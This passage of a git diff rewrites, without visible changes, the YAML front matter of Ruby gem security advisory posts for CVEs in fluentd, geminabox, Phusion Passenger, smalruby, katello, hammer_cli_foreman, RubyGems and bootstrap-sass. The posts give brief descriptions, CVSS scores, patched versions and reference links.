-    - https://access.redhat.com/errata/RHSA-2018:2225
-    - https://github.com/fluent/fluentd/blob/v0.12/CHANGELOG.md#bug-fixes
-    - https://jvn.jp/en/vu/JVNVU95124098/index.html
----
+---
+layout: advisory
+title: 'CVE-2017-10906 (fluentd): Fluentd Escape Sequence Injection Vulnerability'
+comments: false
+categories:
+- fluentd
+advisory:
+  gem: fluentd
+  cve: 2017-10906
+  ghsa: 5jrp-w8fr-mrww
+  url: https://github.com/fluent/fluentd/pull/1733
+  title: Fluentd Escape Sequence Injection Vulnerability
+  date: 2022-05-13
+  description: |
+    Escape sequence injection vulnerability in Fluentd versions 0.12.29 through
+    0.12.40 may allow an attacker to change the terminal UI or execute arbitrary commands
+    on the device via unspecified vectors.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 0.12.29"
+  patched_versions:
+  - ">= 0.12.41"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:2225
+    - https://github.com/fluent/fluentd/blob/v0.12/CHANGELOG.md#bug-fixes
+    - https://jvn.jp/en/vu/JVNVU95124098/index.html
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-14506.md b/advisories/_posts/2022-05-13-CVE-2017-14506.md
index 2b384f85..021f5ca3 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-14506.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-14506.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-14506 (geminabox): Gem in a Box vulnerable to Cross-site Scripting'
-comments: false
-categories:
-- geminabox
-advisory:
-  gem: geminabox
-  cve: 2017-14506
-  ghsa: 98hq-3qvg-pg78
-  url: http://baraktawily.blogspot.co.il/2017/09/gem-in-box-xss-vulenrability-cve-2017.html
-  title: Gem in a Box vulnerable to Cross-site Scripting
-  date: 2022-05-13
-  description: |
-    geminabox (aka Gem in a Box) before 0.13.6 is vulnerable to Cross-site
-    Scripting (XSS), as demonstrated by uploading a gem file that has a crafted gem.homepage
-    value in its .gemspec file.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 0.13.6"
-  related:
-    url:
-    - https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md
-    - https://github.com/geminabox/geminabox/commit/99aaae196c4fc6ae0df28e186ca1e493ae658e02
----
+---
+layout: advisory
+title: 'CVE-2017-14506 (geminabox): Gem in a Box vulnerable to Cross-site Scripting'
+comments: false
+categories:
+- geminabox
+advisory:
+  gem: geminabox
+  cve: 2017-14506
+  ghsa: 98hq-3qvg-pg78
+  url: http://baraktawily.blogspot.co.il/2017/09/gem-in-box-xss-vulenrability-cve-2017.html
+  title: Gem in a Box vulnerable to Cross-site Scripting
+  date: 2022-05-13
+  description: |
+    geminabox (aka Gem in a Box) before 0.13.6 is vulnerable to Cross-site
+    Scripting (XSS), as demonstrated by uploading a gem file that has a crafted gem.homepage
+    value in its .gemspec file.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 0.13.6"
+  related:
+    url:
+    - https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md
+    - https://github.com/geminabox/geminabox/commit/99aaae196c4fc6ae0df28e186ca1e493ae658e02
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-14683.md b/advisories/_posts/2022-05-13-CVE-2017-14683.md
index 30095f2b..7f7c9f75 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-14683.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-14683.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-14683 (geminabox): Gem in a Box vulnerable to Cross-site Request
-  Forgery'
-comments: false
-categories:
-- geminabox
-advisory:
-  gem: geminabox
-  cve: 2017-14683
-  ghsa: qwv2-2x8g-g43g
-  url: http://baraktawily.blogspot.co.il/2017/09/gem-in-box-xss-vulenrability-cve-2017.html
-  title: Gem in a Box vulnerable to Cross-site Request Forgery
-  date: 2022-05-13
-  description: |
-    geminabox (aka Gem in a Box) before 0.13.7 has CSRF, as demonstrated
-    by an unintended gem upload.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 0.13.7"
-  related:
-    url:
-    - https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md
-    - https://github.com/geminabox/geminabox/commit/a01c4e8b3403624109499dec75eb6ee30bd01a55
----
+---
+layout: advisory
+title: 'CVE-2017-14683 (geminabox): Gem in a Box vulnerable to Cross-site Request
+  Forgery'
+comments: false
+categories:
+- geminabox
+advisory:
+  gem: geminabox
+  cve: 2017-14683
+  ghsa: qwv2-2x8g-g43g
+  url: http://baraktawily.blogspot.co.il/2017/09/gem-in-box-xss-vulenrability-cve-2017.html
+  title: Gem in a Box vulnerable to Cross-site Request Forgery
+  date: 2022-05-13
+  description: |
+    geminabox (aka Gem in a Box) before 0.13.7 has CSRF, as demonstrated
+    by an unintended gem upload.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 0.13.7"
+  related:
+    url:
+    - https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md
+    - https://github.com/geminabox/geminabox/commit/a01c4e8b3403624109499dec75eb6ee30bd01a55
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-16355.md b/advisories/_posts/2022-05-13-CVE-2017-16355.md
index ddeb6282..9c7f23b4 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-16355.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-16355.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2017-16355 (passenger): Phusion Passenger information disclosure'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2017-16355
-  ghsa: cv3f-px9r-54hm
-  url: https://github.com/phusion/passenger/commit/4043718264095cde6623c2cbe8c644541036d7bf
-  title: Phusion Passenger information disclosure
-  date: 2022-05-13
-  description: |
-    In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed
-    in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is
-    running as root, it is possible to list the contents of arbitrary files on a system
-    by symlinking a file named REVISION from the application root folder to a file of
-    choice and querying passenger-status --show=xml.
-  cvss_v3: 4.7
-  patched_versions:
-  - ">= 5.1.11"
-  related:
-    url:
-    - https://blog.phusion.nl/2017/10/13/passenger-security-advisory-5-1-11/
-    - https://seclists.org/bugtraq/2019/Mar/34
-    - https://www.debian.org/security/2019/dsa-4415
----
+---
+layout: advisory
+title: 'CVE-2017-16355 (passenger): Phusion Passenger information disclosure'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2017-16355
+  ghsa: cv3f-px9r-54hm
+  url: https://github.com/phusion/passenger/commit/4043718264095cde6623c2cbe8c644541036d7bf
+  title: Phusion Passenger information disclosure
+  date: 2022-05-13
+  description: |
+    In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed
+    in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is
+    running as root, it is possible to list the contents of arbitrary files on a system
+    by symlinking a file named REVISION from the application root folder to a file of
+    choice and querying passenger-status --show=xml.
+  cvss_v3: 4.7
+  patched_versions:
+  - ">= 5.1.11"
+  related:
+    url:
+    - https://blog.phusion.nl/2017/10/13/passenger-security-advisory-5-1-11/
+    - https://seclists.org/bugtraq/2019/Mar/34
+    - https://www.debian.org/security/2019/dsa-4415
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-2096.md b/advisories/_posts/2022-05-13-CVE-2017-2096.md
index ca72f3fe..dbf52e46 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-2096.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-2096.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-2096 (smalruby): smalruby and smalruby-editor vulnerable to OS Command
-  Injection'
-comments: false
-categories:
-- smalruby
-advisory:
-  gem: smalruby
-  cve: 2017-2096
-  ghsa: f489-655r-x6gr
-  url: http://jvn.jp/en/jp/JVN50197114/index.html
-  title: smalruby and smalruby-editor vulnerable to OS Command Injection
-  date: 2022-05-13
-  description: |
-    smalruby-editor prior to 0.4.1 and smalruby prior to 0.1.11 allows remote
-    attackers to execute arbitrary OS commands via unspecified vectors.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.1.11"
-  related:
-    url:
-    - http://smalruby.jp/blog/2017/01/14/smalruby-editor-0-4-1-has-been-released-english.html
-    - https://web.archive.org/web/20200227194312/http://www.securityfocus.com/bid/95775
----
+---
+layout: advisory
+title: 'CVE-2017-2096 (smalruby): smalruby and smalruby-editor vulnerable to OS Command
+  Injection'
+comments: false
+categories:
+- smalruby
+advisory:
+  gem: smalruby
+  cve: 2017-2096
+  ghsa: f489-655r-x6gr
+  url: http://jvn.jp/en/jp/JVN50197114/index.html
+  title: smalruby and smalruby-editor vulnerable to OS Command Injection
+  date: 2022-05-13
+  description: |
+    smalruby-editor prior to 0.4.1 and smalruby prior to 0.1.11 allows remote
+    attackers to execute arbitrary OS commands via unspecified vectors.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.1.11"
+  related:
+    url:
+    - http://smalruby.jp/blog/2017/01/14/smalruby-editor-0-4-1-has-been-released-english.html
+    - https://web.archive.org/web/20200227194312/http://www.securityfocus.com/bid/95775
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-2662.md b/advisories/_posts/2022-05-13-CVE-2017-2662.md
index 9b625e5b..f102aa51 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-2662.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-2662.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2017-2662 (katello): katello Improper Privilege Management vulnerability'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2017-2662
-  ghsa: cpv6-pfq6-j2v7
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2662
-  title: katello Improper Privilege Management vulnerability
-  date: 2022-05-13
-  description: |
-    A flaw was found in Foreman's katello plugin version 3.4.5. After setting
-    a new role to allow restricted access on a repository with a filter (filter set
-    on the Product Name), the filter is not respected when the actions are done via
-    hammer using the repository id.
-  cvss_v3: 4.3
-  patched_versions:
-  - ">= 3.17.0.rc1"
-  related:
-    url:
-    - https://projects.theforeman.org/issues/18838
-    - https://github.com/Katello/katello/pull/8772
-    - https://github.com/Katello/katello/commit/853260e3e9f94179d5881199e7885d1c08e600f6
----
+---
+layout: advisory
+title: 'CVE-2017-2662 (katello): katello Improper Privilege Management vulnerability'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2017-2662
+  ghsa: cpv6-pfq6-j2v7
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2662
+  title: katello Improper Privilege Management vulnerability
+  date: 2022-05-13
+  description: |
+    A flaw was found in Foreman's katello plugin version 3.4.5. After setting
+    a new role to allow restricted access on a repository with a filter (filter set
+    on the Product Name), the filter is not respected when the actions are done via
+    hammer using the repository id.
+  cvss_v3: 4.3
+  patched_versions:
+  - ">= 3.17.0.rc1"
+  related:
+    url:
+    - https://projects.theforeman.org/issues/18838
+    - https://github.com/Katello/katello/pull/8772
+    - https://github.com/Katello/katello/commit/853260e3e9f94179d5881199e7885d1c08e600f6
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-2667.md b/advisories/_posts/2022-05-13-CVE-2017-2667.md
index 40e47278..d379fe48 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-2667.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-2667.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2017-2667 (hammer_cli_foreman): hammer_cli_foreman Improper Certificate
-  Validation vulnerability'
-comments: false
-categories:
-- hammer_cli_foreman
-advisory:
-  gem: hammer_cli_foreman
-  cve: 2017-2667
-  ghsa: 77h8-xr85-3x5q
-  url: https://access.redhat.com/errata/RHSA-2018:0336
-  title: hammer_cli_foreman Improper Certificate Validation vulnerability
-  date: 2022-05-13
-  description: |
-    Hammer CLI, a CLI utility for Foreman, before version 0.10.0, did not
-    explicitly set the verify_ssl flag for apipie-bindings that disable it by default.
-    As a result the server certificates are not checked and connections are prone to
-    man-in-the-middle attacks.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 0.10.0"
-  related:
-    url:
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1436262
-    - http://projects.theforeman.org/issues/19033
-    - http://www.securityfocus.com/bid/97153
----
+---
+layout: advisory
+title: 'CVE-2017-2667 (hammer_cli_foreman): hammer_cli_foreman Improper Certificate
+  Validation vulnerability'
+comments: false
+categories:
+- hammer_cli_foreman
+advisory:
+  gem: hammer_cli_foreman
+  cve: 2017-2667
+  ghsa: 77h8-xr85-3x5q
+  url: https://access.redhat.com/errata/RHSA-2018:0336
+  title: hammer_cli_foreman Improper Certificate Validation vulnerability
+  date: 2022-05-13
+  description: |
+    Hammer CLI, a CLI utility for Foreman, before version 0.10.0, did not
+    explicitly set the verify_ssl flag for apipie-bindings that disable it by default.
+    As a result the server certificates are not checked and connections are prone to
+    man-in-the-middle attacks.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 0.10.0"
+  related:
+    url:
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1436262
+    - http://projects.theforeman.org/issues/19033
+    - http://www.securityfocus.com/bid/97153
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-1000073.md b/advisories/_posts/2022-05-13-CVE-2018-1000073.md
index 3b9ba0b7..7d40022d 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-1000073.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-1000073.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2018-1000073 (rubygems-update): RubyGems Link Following vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000073
-  ghsa: gx69-6cp4-hxrj
-  url: https://github.com/rubygems/rubygems/commit/1b931fc03b819b9a0214be3eaca844ef534175e2
-  title: RubyGems Link Following vulnerability
-  date: 2022-05-13
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability
-    in `install_location` function of `package.rb` that can result in path traversal
-    when writing to a symlinked basedir outside of the root. This vulnerability appears
-    to have been fixed in 2.7.6.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/666ef793cad42eed96f7aee1cdf77865db921099
-    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=925986
----
+---
+layout: advisory
+title: 'CVE-2018-1000073 (rubygems-update): RubyGems Link Following vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000073
+  ghsa: gx69-6cp4-hxrj
+  url: https://github.com/rubygems/rubygems/commit/1b931fc03b819b9a0214be3eaca844ef534175e2
+  title: RubyGems Link Following vulnerability
+  date: 2022-05-13
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability
+    in `install_location` function of `package.rb` that can result in path traversal
+    when writing to a symlinked basedir outside of the root. This vulnerability appears
+    to have been fixed in 2.7.6.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/666ef793cad42eed96f7aee1cdf77865db921099
+    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=925986
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-1000075.md b/advisories/_posts/2022-05-13-CVE-2018-1000075.md
index fb58bb53..9ce83407 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-1000075.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-1000075.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-1000075 (rubygems-update): RubyGems Infinite Loop vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000075
-  ghsa: 74pv-v9gh-h25p
-  url: https://github.com/rubygems/rubygems/commit/92e98bf8f810bd812f919120d4832df51bc25d83
-  title: RubyGems Infinite Loop vulnerability
-  date: 2022-05-13
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a infinite loop caused by negative
-    size vulnerability in ruby gem package tar header that can result in a negative
-    size could cause an infinite loop.. This vulnerability appears to have been fixed
-    in 2.7.6.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
----
+---
+layout: advisory
+title: 'CVE-2018-1000075 (rubygems-update): RubyGems Infinite Loop vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000075
+  ghsa: 74pv-v9gh-h25p
+  url: https://github.com/rubygems/rubygems/commit/92e98bf8f810bd812f919120d4832df51bc25d83
+  title: RubyGems Infinite Loop vulnerability
+  date: 2022-05-13
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a infinite loop caused by negative
+    size vulnerability in ruby gem package tar header that can result in a negative
+    size could cause an infinite loop.. This vulnerability appears to have been fixed
+    in 2.7.6.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-12615.md b/advisories/_posts/2022-05-13-CVE-2018-12615.md
index a3d486ee..0a95e2da 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-12615.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-12615.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2018-12615 (passenger): Phusion Passenger incorrect permission assignment'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2018-12615
-  ghsa: 4284-jfhc-f854
-  url: https://github.com/phusion/passenger/commit/4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8
-  title: Phusion Passenger incorrect permission assignment
-  date: 2022-05-13
-  description: |
-    An issue was discovered in switchGroup() in agent/ExecHelper/ExecHelperMain.cpp
-    in Phusion Passenger before 5.3.2. The set of groups (gidset) is not set correctly,
-    leaving it up to randomness (i.e., uninitialized memory) which supplementary groups
-    are actually being set while lowering privileges.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 5.3.2"
----
+---
+layout: advisory
+title: 'CVE-2018-12615 (passenger): Phusion Passenger incorrect permission assignment'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2018-12615
+  ghsa: 4284-jfhc-f854
+  url: https://github.com/phusion/passenger/commit/4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8
+  title: Phusion Passenger incorrect permission assignment
+  date: 2022-05-13
+  description: |
+    An issue was discovered in switchGroup() in agent/ExecHelper/ExecHelperMain.cpp
+    in Phusion Passenger before 5.3.2. The set of groups (gidset) is not set correctly,
+    leaving it up to randomness (i.e., uninitialized memory) which supplementary groups
+    are actually being set while lowering privileges.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 5.3.2"
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-14040.md b/advisories/_posts/2022-05-13-CVE-2018-14040.md
index f367bb23..cba96968 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-14040.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-14040.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2018-14040 (bootstrap-sass): Bootstrap vulnerable to Cross-Site Scripting
-  (XSS)'
-comments: false
-categories:
-- bootstrap-sass
-advisory:
-  gem: bootstrap-sass
-  cve: 2018-14040
-  ghsa: 3wqf-4x89-9g79
-  url: https://github.com/advisories/GHSA-3wqf-4x89-9g79
-  title: Bootstrap vulnerable to Cross-Site Scripting (XSS)
-  date: 2022-05-13
-  description: |
-    In Bootstrap starting in version 2.3.0 and prior to 3.4.0, as well as
-    4.x before 4.1.2, XSS is possible in the collapse data-parent attribute.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 2.3.0"
-  patched_versions:
-  - "~> 3.4.0"
-  - ">= 4.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-14040
-    - https://github.com/twbs/bootstrap/issues/26423
-    - https://github.com/twbs/bootstrap/issues/26625
-    - https://github.com/twbs/bootstrap/pull/26630
-    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@
-    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
-    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@
-    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@
-    - https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@
-    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
-    - https://lists.debian.org/debian-lts-announce/2018/08/msg00027.html
-    - https://seclists.org/bugtraq/2019/May/18
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - https://www.tenable.com/security/tns-2021-14
-    - http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html
-    - http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
-    - http://seclists.org/fulldisclosure/2019/May/10
-    - http://seclists.org/fulldisclosure/2019/May/11
-    - http://seclists.org/fulldisclosure/2019/May/13
-    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/collapse.js#L140
-    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/scrollspy.js#L56
-    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/tooltip.js#L352
-    - https://github.com/twbs/bootstrap-rubygem/commit/f34c43c936ac7d0ebb129289321d8c51cd56aed1#diff-4e736e880b7fc39eb5e85576b629f6e3cd08f02f45104a7b4581f82852e97a81R1306
-    - https://github.com/twbs/bootstrap/commit/149096016f70fd815540d62c0989fd99cdc809e0
-    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2018-14040.yml
-    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
-    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
-    - https://github.com/advisories/GHSA-3wqf-4x89-9g79
----
+---
+layout: advisory
+title: 'CVE-2018-14040 (bootstrap-sass): Bootstrap vulnerable to Cross-Site Scripting
+  (XSS)'
+comments: false
+categories:
+- bootstrap-sass
+advisory:
+  gem: bootstrap-sass
+  cve: 2018-14040
+  ghsa: 3wqf-4x89-9g79
+  url: https://github.com/advisories/GHSA-3wqf-4x89-9g79
+  title: Bootstrap vulnerable to Cross-Site Scripting (XSS)
+  date: 2022-05-13
+  description: |
+    In Bootstrap starting in version 2.3.0 and prior to 3.4.0, as well as
+    4.x before 4.1.2, XSS is possible in the collapse data-parent attribute.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 2.3.0"
+  patched_versions:
+  - "~> 3.4.0"
+  - ">= 4.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14040
+    - https://github.com/twbs/bootstrap/issues/26423
+    - https://github.com/twbs/bootstrap/issues/26625
+    - https://github.com/twbs/bootstrap/pull/26630
+    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@
+    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
+    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@
+    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@
+    - https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@
+    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
+    - https://lists.debian.org/debian-lts-announce/2018/08/msg00027.html
+    - https://seclists.org/bugtraq/2019/May/18
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - https://www.tenable.com/security/tns-2021-14
+    - http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html
+    - http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
+    - http://seclists.org/fulldisclosure/2019/May/10
+    - http://seclists.org/fulldisclosure/2019/May/11
+    - http://seclists.org/fulldisclosure/2019/May/13
+    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/collapse.js#L140
+    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/scrollspy.js#L56
+    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/tooltip.js#L352
